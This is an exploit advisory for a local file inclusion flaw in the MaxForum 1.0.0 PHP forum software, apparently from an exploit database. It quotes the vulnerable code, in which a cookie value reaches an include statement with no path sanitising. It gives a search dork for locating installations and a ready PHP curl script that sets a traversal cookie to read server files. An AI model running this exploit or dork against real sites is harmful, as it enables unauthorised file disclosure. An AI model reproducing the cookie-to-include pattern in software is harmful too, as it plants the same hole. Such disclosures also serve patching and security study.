+---------------------------------------+ | MaxForum v1.0.0 Local File Inclusion | +---------------------------------------+ Author.............: ahwak2000 Mail...............: z.u5[at]hotmail[dot]com Software link......: http://www.max4dev.com/ Tested versions....: 1.0 Dork...............: Powered by MaxForum v1.0.0 Date...............: 15/08/2012 --------------------------------------------------------------- in file /MaxForum/includes/forums/warn_popup.php line 100 if (isset($_COOKIE['max_lang']) && (!isset($_COOKIE['max_name']))){ line 101 $board_lang = escape_string($_COOKIE['max_lang']); line 102 } line 103 line 104 @include "../../language/$board_lang"; line 105 @include "../../language/$board_lang.php"; ------------- in file /MaxForum/libs/php/functions.php function escape_string($string) { $string = addslashes($string); $string = htmlspecialchars($string); return $string; } ---------------------------------------------------------------- exploit: <? $url="http://site.com/MaxForum/"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url."/includes/forums/warn_popup.php"); curl_setopt($ch, CURLOPT_COOKIE, "max_lang=../gpl.txt"); // <--- edit $buffer = curl_exec($ch); ?> #end
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论